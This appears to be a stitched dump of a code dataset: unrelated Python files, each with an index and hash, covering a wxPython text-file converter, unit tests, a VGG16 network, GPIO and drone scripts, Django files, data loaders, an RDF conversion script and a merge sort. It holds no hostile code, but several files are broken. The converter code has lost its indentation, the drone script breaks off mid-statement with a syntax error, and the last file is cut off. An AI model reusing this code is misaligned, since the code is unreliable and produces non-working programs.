if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
if self.input[3] == '': #if no output changes
count = 1
while temp != '':
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(temp2)):
if not self.want_csv:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ',')
else:
out_file.write(temp2[x])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(temp2)):
if self.want_csv:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
count = 1
while temp != '': #if output formatting
for x in range(len(self.input[3])):
if type(self.input[3][x]) != int:
self.logger.AppendText("\nInvalid Output Format\n\n")
self.enable_buttons()
return
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = ["NULL"] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = temp2[x] #first spot is 1
except IndexError:
pass
for x in range(len(new_line)):
if not self.want_csv:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = [""] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = temp2[x] #first spot is 1
except IndexError:
pass
for x in range(len(new_line)):
if self.want_csv:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
else:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
def copy_select(self):
'''Copy some of input to output file'''
for x in range(len(self.input[2])):
if type(self.input[2][x]) != int and ':' not in self.input[2][x]:
self.logger.AppendText("\nInvalid Input Format\n\n")
self.enable_buttons()
return
try:
in_file = open(self.input[0], 'r')
except IOError:
self.logger.AppendText("\nInvalid Input File\n\n")
self.enable_buttons()
return
try:
out_file = open(self.input[1], 'w')
except IOError:
self.logger.AppendText("\nInvalid Output File\n\n")
self.enable_buttons()
return
temp = ''
if self.is_header:
temp = in_file.readline()
temp = in_file.readline()
if self.is_csv:
find_length_in = len(temp.split(','))
else:
find_length_in = len(temp.split())
try:
if max(self.input[2]) > find_length_in:
in_file.close()
out_file.close()
self.logger.AppendText("\nInput Format Value Too Large\n\n")
self.enable_buttons()
return
except ValueError:
pass
in_file.seek(0)
self.logger.AppendText("\nConverting...\n\n")
if self.is_header: #copy header file
temp = in_file.readline()
if temp[-1] == '\n':
temp = temp[:-1]
if self.copy_header:
if self.is_csv:
temp2 = temp.split(',')
for x in range(len(temp2)):
if not self.want_csv:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
out_file.write('\n')
else:
temp2 = temp.split()
for x in range(len(temp2)):
if self.want_csv:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
#Copy selected ones over
count = 1
if self.input[3] == '': #if no output formatting
while temp != '':
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(self.input[2])):
if not self.want_csv:
if temp2[self.input[2][x] - 1] != '':
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + " ")
else:
out_file.write(temp2[self.input[2][x] - 1])
else:
if x != len(self.input[2]) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + ",")
else:
out_file.write(temp2[self.input[2][x] - 1])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
for x in range(len(self.input[2])):
if self.want_csv:
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + ",")
else:
out_file.write(temp2[self.input[2][x] - 1])
else:
if temp2[self.input[2][x] - 1] != '':
if x != len(self.input[2]) - 1:
out_file.write(temp2[self.input[2][x] - 1] + " ")
else:
out_file.write(temp2[self.input[2][x] - 1])
else:
if x != len(self.input[2]) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
while temp != '': #if output formatting
for x in range(len(self.input[3])):
if type(self.input[3][x]) != int:
self.logger.AppendText("\nInvalid Output Format\n\n")
self.enable_buttons()
return
if temp[-1] == '\n':
temp = temp[:-1]
if self.is_csv:
temp2 = temp.split(',')
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = ["NULL"] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = \
temp2[self.input[2][x] - 1]
#first spot is 1
except IndexError:
try:
new_line.append(temp2[self.input[2][x] - 1])
except IndexError:
pass
for x in range(len(new_line)):
if not self.want_csv:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
out_file.write('\n')
else:
temp2 = temp.split()
check = self.filter_line(temp2)
if check == -1:
self.logger.AppendText("Invalid Filter Inputted")
self.enable_buttons()
return
elif check == 0:
temp = in_file.readline()
continue
new_line = [""] * max(self.input[3])
for x in range(len(temp2)):
try:
new_line[self.input[3][x] - 1] = \
temp2[self.input[2][x] - 1]
#first spot is 1
except IndexError:
try:
new_line.append(temp2[self.input[2][x] - 1])
except IndexError:
pass
for x in range(len(new_line)):
if self.want_csv:
if x != len(new_line) - 1:
out_file.write(new_line[x] + ",")
else:
out_file.write(new_line[x])
else:
if new_line[x] != '':
if x != len(new_line) - 1:
out_file.write(new_line[x] + " ")
else:
out_file.write(new_line[x])
else:
if x != len(new_line) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
out_file.write('\n')
temp = in_file.readline()
try:
if self.input[4] != '' and count >= int(self.input[4]):
break
count += 1
except ValueError:
self.logger.AppendText("\nInvalid number of runs\n\n")
return
in_file.close()
out_file.close()
self.enable_buttons()
self.logger.AppendText("\nFinished Conversion\n\n")
return
def filter_line(self, line):
'''Checks if line passes filter'''
if self.input[5]=='' or self.input[5]==[''] or self.input[5] == [['']]:
return 1
for x in range(len(self.input[5])):
temp = copy.deepcopy(self.input[5])
try:
if '*' in temp[x][1] and '--' in temp[x][1]:
temp[x][1] = temp[x][1].translate(None, "*")
temp[x][1] = temp[x][1].translate(None, "--")
if temp[x][1] in line[self.input[5][x][0]-1]:
return 0
elif '*' in temp[x][1]:
temp[x][1] = temp[x][1].translate(None, "*")
if temp[x][1] not in line[self.input[5][x][0]-1]:
return 0
elif '%' in temp[x][1] and '--' in temp[x][1]:
temp[x][1] = temp[x][1].translate(None, "--")
if len(temp[x][1]) == len(line[self.input[5][x][0]-1]):
flag = True
for y in range(len(temp[x][1])):
if temp[x][1][y] != line[self.input[5][x][0]-1][y]\
and temp[x][1][y] != '%':
flag = False
break
if flag:
return 0
elif '%' in temp[x][1]:
if len(temp[x][1]) != len(line[self.input[5][x][0]-1]):
return 0
for y in range(len(temp[x][1])):
if temp[x][1][y] != line[self.input[5][x][0]-1][y]\
and temp[x][1][y] != '%':
return 0
elif '--' == temp[x][1][:2]:
temp[x][1] = temp[x][1].translate(None, "--")
if line[self.input[5][x][0] - 1] == temp[x][1]:
return 0
else:
if line[self.input[5][x][0] - 1] != temp[x][1]:
return 0
except IndexError:
return -1
return 1
def make_bold(self, text):
'''Makes prompts and button text bold'''
temp_font = text.GetFont()
temp_font.SetWeight(wx.BOLD)
text.SetFont(temp_font)
def disable_buttons(self):
'''Prevent User from clicking any buttons'''
self.convert_button.Enable(False)
self.clear_button.Enable(False)
self.browse_button_out.Enable(False)
self.browse_button_input.Enable(False)
def enable_buttons(self):
'''Reenable buttons to be pressed'''
self.convert_button.Enable(True)
self.clear_button.Enable(True)
self.browse_button_out.Enable(True)
self.browse_button_input.Enable(True)
def OnCheckHead(self, e):
if self.is_header == False:
self.is_header = True
else:
self.is_header = False
if self.header_copy.IsEnabled():
self.header_copy.Enable(False)
else:
self.header_copy.Enable(True)
def OnCheckCopy(self, e):
if self.copy_header:
self.copy_header = False
else:
self.copy_header = True
def OnCheckCSV(self, e):
if self.is_csv:
self.is_csv = False
if self.smart_check:
self.want_csv = True
self.out_is_csv.SetValue(True)
else:
self.is_csv = True
if self.smart_check:
self.want_csv = False
self.out_is_csv.SetValue(False)
def OnCheckOut(self, e):
if self.want_csv:
self.want_csv = False
else:
self.want_csv = True
def OnSmartCheck(self, e):
if self.smart_check:
self.smart_check = False
self.out_is_csv.Enable(True)
else:
self.smart_check = True
self.out_is_csv.Enable(False)
# Run the GUI: wx.App(False) keeps stdout/stderr on the console instead of
# redirecting them to a window; MainLoop() blocks in the wx event loop.
app = wx.App(False)
frame = mainwindow(None, "Fire Interpolation System")
frame.Show()
app.MainLoop()
|
18,380 | ad57751f5c44160e29dc327a37a4c66a13c1a327 | release_version = "0.0.13"
|
18,381 | 195a7371124b995789d3e4d7a938b506ab7f7c15 | from rehearsal.if_AB import if_AB
def test_1():
    """Counts ending in 1 (outside the teens) take the form 'bochka'."""
    assert if_AB(1) == '1 bochka'
    assert if_AB(101) == '101 bochka'
    assert if_AB(301) == '301 bochka'
def test_many():
    """Counts such as 8, 10 and 1000 take the plural form 'bochek'."""
    assert if_AB(10) == '10 bochek'
    assert if_AB(1000) == '1000 bochek'
    assert if_AB(8) == '8 bochek'
def test_some():
    """Counts ending in 2-4 (outside the teens) take the form 'bochki'."""
    assert if_AB(3) == '3 bochki'
    assert if_AB(4) == '4 bochki'
    assert if_AB(2) == '2 bochki'
    assert if_AB(93) == '93 bochki'
    assert if_AB(194) == '194 bochki'
    assert if_AB(402) == '402 bochki'
def test_exeption():
    """Teen counts (11-14, also above 100) take 'bochek' despite their last digit."""
    assert if_AB(11) == '11 bochek'
    assert if_AB(12) == '12 bochek'
    assert if_AB(13) == '13 bochek'
    assert if_AB(113) == '113 bochek'
    assert if_AB(214) == '214 bochek'
18,382 | d6a4d8b9df3619dbf0b7d8300ec2ea4fd7a56d5b | import torch
import torch.nn as nn
class Vgg16(nn.Module):
    """VGG-16 (configuration D) with batch normalisation.

    Expects input of shape (N, 3, 224, 224). ``forward`` returns a tuple
    ``(net_features, logits)`` where ``net_features`` is the final
    (N, 512, 7, 7) feature map and ``logits`` has shape (N, 1000).

    Fixes relative to the original:
      * ``nn.BatchNorm2d`` takes its channel count as ``num_features`` —
        the keyword ``out_channels=`` raised TypeError at construction.
      * The 3x3 convolutions now use ``padding=1`` so only the pools
        shrink the feature map (224 -> 112 -> 56 -> 28 -> 14 -> 7),
        matching the ``7*7*512`` input expected by ``fc0``.
      * ``forward`` applied ``pool4`` twice and never used ``pool3``.
      * The fully connected blocks use ``nn.BatchNorm1d`` because
        ``BatchNorm2d`` rejects 2-D ``(N, features)`` input.
    """

    @staticmethod
    def _conv_block(in_channels, out_channels, num_convs):
        """Stack ``num_convs`` [3x3 conv -> BN -> ReLU] units; the first
        conv maps in_channels -> out_channels, the rest keep out_channels."""
        layers = []
        for i in range(num_convs):
            layers.append(nn.Conv2d(in_channels=in_channels if i == 0 else out_channels,
                                    out_channels=out_channels,
                                    kernel_size=3, stride=1, padding=1))
            layers.append(nn.BatchNorm2d(out_channels))
            layers.append(nn.ReLU())
        return nn.Sequential(*layers)

    def __init__(self):
        super().__init__()
        self.conv0 = self._conv_block(3, 64, 2)
        self.pool0 = nn.MaxPool2d(kernel_size=2, stride=2)
        self.conv1 = self._conv_block(64, 128, 2)
        self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2)
        self.conv2 = self._conv_block(128, 256, 3)
        self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2)
        self.conv3 = self._conv_block(256, 512, 3)
        self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2)
        self.conv4 = self._conv_block(512, 512, 3)
        self.pool4 = nn.MaxPool2d(kernel_size=2, stride=2)
        self.fc0 = nn.Sequential(
            nn.Linear(7 * 7 * 512, 4096),
            nn.BatchNorm1d(4096),
            nn.ReLU()
        )
        self.fc1 = nn.Sequential(
            nn.Linear(4096, 4096),
            nn.BatchNorm1d(4096),
            nn.ReLU()
        )
        self.final = nn.Linear(4096, 1000)

    def forward(self, x):
        x = self.pool0(self.conv0(x))
        x = self.pool1(self.conv1(x))
        x = self.pool2(self.conv2(x))
        x = self.pool3(self.conv3(x))      # was self.pool4; pool3 was unused
        net_features = self.pool4(self.conv4(x))
        x = net_features.view(net_features.size(0), -1)
        x = self.fc0(x)
        x = self.fc1(x)
        x = self.final(x)
        return net_features, x
|
18,383 | c82e83d58a6a6d89c989750731b24b0551ed66e9 | class valueTooSmallException(Exception):
pass
class valueTooLargeException(Exception):
    """Raised when a supplied value exceeds the allowed maximum."""
    pass
class wrongCodeLength(Exception):
    """Raised when a code does not have the required length."""
    pass
class numberOutOfRange(Exception):
    """Raised when a number falls outside the permitted range."""
    pass
18,384 | 786955999d3c9bf216743f0349103903675f6a34 | import RPi.GPIO as GPIO
class LedController:
    """Drive a single LED attached to one Raspberry Pi GPIO output pin."""
    def __init__(self, pinNum, name):
        # Configure the pin as an output and drive it low (LED off) at start.
        self.pin = pinNum
        self.name = name
        print("Initializing LED for {} on pin {}".format(self.name, self.pin))
        GPIO.setup(self.pin, GPIO.OUT)
        GPIO.output(self.pin, False)
    def turnOn(self):
        # Drive the pin high to light the LED.
        print( " Turning {} LED on".format( self.name))
        GPIO.output(self.pin, True)
    def turnOff(self):
        # Drive the pin low to switch the LED off.
        print(" Turning {} LED off".format( self.name))
        GPIO.output(self.pin, False)
    def teardown(self):
        # Make sure the LED is off before the controller is discarded.
        print("Tearing down {} LED".format( self.name))
        self.turnOff()
|
18,385 | 68394153f3dfea0b4484ada22364439f66511cfd | import cv2, time, ps_drone, math, sys
import numpy as numpy
from PIL import Image, ImageTk
drone = ps_drone.Drone()
IMC = drone.VideoImageCount
drone.startup()
drone.reset()
drone.trim()
time.sleep(2)
centered = False
average = 0
counter = 0
prevAngle = 0
landed = False
def loop():
    """Main tracking loop: wait for each new drone video frame and run
    circle detection on it.

    NOTE(review): this function is truncated in the source — the final
    ``if x != -1`` has no colon or body (a syntax error), and the
    ``circle_detect`` helper it calls is not defined in this file.
    """
    global IMC
    global counter
    global average
    global centered
    global prevAngle
    global landed
    while landed == False:
        # Block until the drone delivers a new video frame.
        while drone.VideoImageCount == IMC:
            time.sleep(0.01)
        IMC = drone.VideoImageCount
        frame = drone.VideoImage
        # Altitude from the "demo" navdata packet.
        alt = drone.NavData["demo"][3]
        cx = 0
        cy = 0
        r = 0
        area = 0
        area, x , y, radius = circle_detect(frame)
        if x != -1
def setup(drone):
    """Initialise the drone, wait for telemetry, take off, start the
    ground camera video stream, then hand control to loop().

    NOTE(review): the bare ``print "..."`` statements are Python-2-only
    syntax; this file will not parse under Python 3.
    """
    drone.startup()
    drone.reset()
    drone.trim()
    time.sleep(2)
    # Wait until battery telemetry becomes available (-1 == not ready).
    while (drone.getBattery()[0] == -1): time.sleep(0.1)
    print "Battery: "+str(drone.getBattery()[0])+"% "+str(drone.getBattery()[1])
    drone.useDemoMode(True)
    drone.setConfigAllID()
    drone.sdVideo()
    drone.groundCam()
    # Wait for one configuration round-trip before continuing.
    CDC = drone.ConfigDataCount
    while CDC == drone.ConfigDataCount: time.sleep(0.0001)
    print "Taking off..."
    drone.takeoff()
    time.sleep(5)
    drone.hover()
    drone.startVideo()
    drone.getNDpackage(["demo"])
    loop()
|
18,386 | e0c2a0c6b79d118633d9d3d15b35cf58c84abb2c | __author__ = 'julius'
from django.urls import path
from . import views
# URL routes for the expenses app: list, create, edit and detail views.
urlpatterns = [
    path('', views.expense_index,name='expenses'),
    path('add', views.expense_add,name='expense_add'),
    path('edit/<int:id>', views.expense_edit,name='expense_edit'),
    path('<int:id>', views.expense_detail,name='expense'),
]
18,387 | 263a2db8db7fd113714ef0adc44b28a910096b13 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-06-13 14:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds three optional product image upload
    fields (imagem_produto_1..3) to the ``anuncio`` model."""
    dependencies = [
        ('radiosite', '0012_auto_20170609_1641'),
    ]
    operations = [
        migrations.AddField(
            model_name='anuncio',
            name='imagem_produto_1',
            field=models.FileField(blank=True, null=True, upload_to=''),
        ),
        migrations.AddField(
            model_name='anuncio',
            name='imagem_produto_2',
            field=models.FileField(blank=True, null=True, upload_to=''),
        ),
        migrations.AddField(
            model_name='anuncio',
            name='imagem_produto_3',
            field=models.FileField(blank=True, null=True, upload_to=''),
        ),
    ]
|
18,388 | 6574e65f85e622277fe9a4be863fa6bcc35c6e37 | import pandas as pd
def load():
    """Load the 2020 Zillow housing CSV keyed by (state, fips).

    Returns a dict with the DataFrame under "df", the key column names
    under "keys", and a column -> float mapping for every non-key column
    under "types".
    """
    df = pd.read_csv("housing/zillow_housing_2020.csv")
    # FIPS codes must keep their leading zero, so store them as 2-char strings.
    df.loc[:, "fips"] = df.fips.astype(str).str.zfill(2)
    key_columns = ("state", "fips")
    value_types = {}
    for column in df.columns:
        if column not in key_columns:
            value_types[column] = float
    return {"df": df, "keys": ["state", "fips"], "types": value_types}
|
18,389 | 13bbb0cb7ebf71d34ceadb659cca4dd7e94621e8 | import json
import json
import base64

from PIL import Image

# Convert ICDAR-style annotation lines of the form
#   820,827,1559,827,1559,930,820,930,textline
# (four corner points followed by a label) into a labelme-format JSON
# file with the image embedded as base64.

IMAGE_PATH = './IMG_6550.JPG'

img = Image.open(IMAGE_PATH)
# BUG FIX: PIL's Image.size is (width, height); the original unpacked it
# as (h, w), which swapped imageHeight/imageWidth in the output JSON.
(w, h) = img.size

with open(IMAGE_PATH, 'rb') as f1:
    base64_data = base64.b64encode(f1.read())

x1 = []
x2 = []
x3 = []
x4 = []
t = []
with open('./IMG_6550.txt') as f:
    for line in f:
        line = line.strip()
        if not line:
            # Skip blank lines instead of crashing on the split below.
            continue
        words = line.split(',')
        x1.append([float(words[0]), float(words[1])])
        x2.append([float(words[2]), float(words[3])])
        x3.append([float(words[4]), float(words[5])])
        x4.append([float(words[6]), float(words[7])])
        t.append(words[8])

jsontext = {
    'version': '4.2.10',
    'flags': {},
    'shapes': [],
    'imagePath': 'IMG_6550.JPG',
    # BUG FIX: decode the base64 bytes to text; str() on a bytes object
    # embedded the literal "b'...'" wrapper in the JSON.
    'imageData': base64_data.decode('ascii'),
    'imageHeight': int(h),
    'imageWidth': int(w),
}
for i in range(len(x1)):
    jsontext['shapes'].append({
        'label': t[i],
        'points': [x1[i], x2[i], x3[i], x4[i]],
        'shape_type': 'polygon',
        'flags': {},
        'group_id': None,
    })

jsondata = json.dumps(jsontext, indent=2, separators=(',', ': '))
with open('filename.json', 'w') as out:
    out.write(jsondata)
|
18,390 | 3958d0a1647cd07cfe14be26e8722ef9babd3291 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2016, Silvio Peroni <essepuntato@gmail.com>
#
# Permission to use, copy, modify, and/or distribute this software for any purpose
# with or without fee is hereby granted, provided that the above copyright notice
# and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT,
# OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE,
# DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
# SOFTWARE.
__author__ = 'essepuntato'
import argparse
import os
import re
import shutil
import json
from reporter import Reporter
from rdflib import ConjunctiveGraph
def load(cur_graph, rdf_file_path, tmp_dir=None):
    """Parse the JSON-LD file at ``rdf_file_path`` into ``cur_graph``.

    If parsing in place fails with IOError and ``tmp_dir`` is given, the
    file is first copied into ``tmp_dir`` and parsed from there. Errors
    are reported through the module-level ``reperr`` reporter instead of
    being raised. Returns the (possibly updated) graph.
    """
    if os.path.isfile(rdf_file_path):
        try:
            cur_graph = __load_graph(cur_graph, rdf_file_path)
        except IOError:
            if tmp_dir is not None:
                # Retry from a copy in the temporary directory.
                current_file_path = tmp_dir + os.sep + "tmp_rdf_file_create_nq.rdf"
                shutil.copyfile(rdf_file_path, current_file_path)
                try:
                    cur_graph = __load_graph(cur_graph, current_file_path)
                except IOError as e:
                    reperr.add_sentence("It was impossible to handle the format used for "
                                        "storing the file (stored in the temporary path) '%s'. "
                                        "Additional details: %s"
                                        % (current_file_path, str(e)))
                os.remove(current_file_path)
            else:
                reperr.add_sentence("It was impossible to try to load the file from the "
                                    "temporary path '%s' since that has not been specified in "
                                    "advance" % rdf_file_path)
    else:
        reperr.add_sentence("The file specified ('%s') doesn't exist."
                            % rdf_file_path)
    return cur_graph
def __load_graph(current_graph, file_path):
    """Parse one JSON-LD file (single object or list) into ``current_graph``.

    Each resource's ``@context`` is replaced with the pre-loaded
    module-level ``context_json`` so rdflib does not fetch the context
    over the network. Raises IOError on any parsing failure.
    """
    errors = ""
    try:
        with open(file_path) as f:
            json_ld_file = json.load(f)
            # Normalise a single resource to a one-element list.
            if isinstance(json_ld_file, dict):
                json_ld_file = [json_ld_file]
            for json_ld_resource in json_ld_file:
                # Trick to force the use of a pre-loaded context if the format
                # specified is JSON-LD
                cur_context = json_ld_resource["@context"]
                json_ld_resource["@context"] = context_json
                current_graph.parse(data=json.dumps(json_ld_resource), format="json-ld")
            return current_graph
    except Exception as e:
        errors = " | " + str(e)  # Try another format
    raise IOError("It was impossible to handle the format used for storing the file '%s'%s" %
                  (file_path, errors))
if __name__ == "__main__":
    # Command-line entry point: walk the input directory, parse every
    # *.json file as JSON-LD (with the supplied context substituted in)
    # and append the resulting N-Quads to the output file.
    arg_parser = argparse.ArgumentParser("create_nq.py",
                                         description="This script create an nt file given a directory containing json-ld files.")
    arg_parser.add_argument("-i", "--input", dest="input", required=True,
                            help="The directory containing the json-ld data.")
    arg_parser.add_argument("-o", "--output", dest="output", required=True,
                            help="The output file.")
    arg_parser.add_argument("-t", "--tmp_dir", dest="tmp_dir",
                            help="The directory for easing the RDF loading.")
    arg_parser.add_argument("-c", "--context", dest="context", required=True,
                            help="The JSON-LD context to use.")
    args = arg_parser.parse_args()
    # Pre-load the JSON-LD context once; __load_graph substitutes it into
    # every resource.
    with open(args.context) as f:
        context_json = json.load(f)
    repok = Reporter(True, prefix="[create_nq.py: INFO] ")
    reperr = Reporter(True, prefix="[create_nq.py: ERROR] ")
    repok.new_article()
    reperr.new_article()
    for cur_dir, cur_subdir, cur_files in os.walk(args.input):
        with open(args.output, 'a') as f:
            for cur_file in cur_files:
                if cur_file.endswith(".json"):
                    cur_g = ConjunctiveGraph()
                    cur_g = load(cur_g, cur_dir + os.sep + cur_file, args.tmp_dir)
                    nt_strings = cur_g.serialize(format="nquads")
                    f.write(nt_strings)
    repok.add_sentence("Done.")
    if not reperr.is_empty():
        # Error report file name is derived from the (sanitised) input path.
        reperr.write_file("create_nq.rep.%s.err.txt" % (
            re.sub("_+", "_", re.sub("[\.%s/]" % os.sep, "_", args.input))))
|
18,391 | 879571cbb421227bf70fb66f6eaa131d041aad47 | import art_cli.artifactory_api as artifactory_api
import art_cli.artifactory_cli as artifactory_cli
__all__ = ["artifactory_api", "artifactory_cli"] |
18,392 | b8189b54d0159a0e1558628b0adc2db345bf8e39 | # runner.GlobalSetting
# for stress test
import os
import sys
ITERATION = 0 # integer type,0 means don't iterate
RUNTIME = 0 # integer type,total run time(seconds),default is 0 ,means don't limit
#===============================================================================
# NEEDREPORTS means that it will produce report for every iteration
# if you run stress testing that only includes one test case
# suggest you set it False
#===============================================================================
NEEDREPORTS = True
AUTOMATIONOPENREPORT = False
REPORTERROOTPATH = 'reports' + os.sep
SENDMAILFLAG = False
# specify test range
TESTCASEID_RANGE_FLAG = False # True or False
# TEST CASE ID RANGE:0 means the first test case,and -1 means the last one
TESTCASEID_START = '1' # string type,like TESTCASEID_START = '001'
TESTCASEID_END = '5' # Don't include the testcaseid itself
# specify sheet name list will be tested, [] means all of sheet
SHEETS = ['lianxiang_test1'] # e.g. ['DDD', 'DDD']
def setTestcaseId_Range_Flag(param):
    """Enable/disable limiting the run to a test-case id range."""
    global TESTCASEID_RANGE_FLAG
    TESTCASEID_RANGE_FLAG = param
def setTestcaseIdRange(begin, end):
    """Set the test-case id range; ``end`` itself is excluded from the run."""
    global TESTCASEID_START, TESTCASEID_END
    TESTCASEID_START = begin
    TESTCASEID_END = end
def getEncoding():
    """Return 'UTF-8' on UTF-8 filesystems, otherwise the default 'gb2312'."""
    if sys.getfilesystemencoding().lower() == 'utf-8':
        return 'UTF-8'
    return 'gb2312'
def init():
    """Reset stress-test settings: single iteration, unlimited runtime,
    per-iteration reports enabled, and all sheets selected."""
    global ITERATION, RUNTIME, NEEDREPORTS, SHEETS
    ITERATION = 1
    RUNTIME = 0
    NEEDREPORTS = True
    SHEETS = []
# test method
if __name__ == '__main__':
    # Parenthesised print calls work under both Python 2 and Python 3;
    # the original bare "print x" statements were Python-2-only syntax.
    #init()
    print(ITERATION)
    print(getEncoding())
|
18,393 | 98da0d6edd50b967910b0d92f9ab7f725fb73614 | # 归并排序
def merge_sort_c(data_list, p, q):
"""
递归调用
"""
# 退出条件
if p + 1 >= q: # 只有两个元素的时候退出
return
else:
r = (p + q) // 2 # 中间位置下标
merge_sort_c(data_list, p, r)
merge_sort_c(data_list, r, q)
merge(data_list, p, r, q) # 将data_list[p:r] 与 data_list[r:q] 按顺序归并到 data_list 相应位置
def merge(data_list, p, r, q):
    """Merge the two sorted runs data_list[p:r] and data_list[r:q] in place.

    Example: with data_list[p:q] == [1, 4, 2, 3], the runs [1, 4] and
    [2, 3] are combined so data_list[p:q] becomes [1, 2, 3, 4].
    """
    merged = []
    left, right = p, r
    # Take the smaller head element of the two runs until one is exhausted.
    # '<=' keeps the merge stable (left run wins ties).
    while left < r and right < q:
        if data_list[left] <= data_list[right]:
            merged.append(data_list[left])
            left += 1
        else:
            merged.append(data_list[right])
            right += 1
    # Append whatever remains of either run (at most one is non-empty).
    merged.extend(data_list[left:r])
    merged.extend(data_list[right:q])
    # Copy the merged result back into the original slice.
    data_list[p:q] = merged
if __name__ == "__main__":
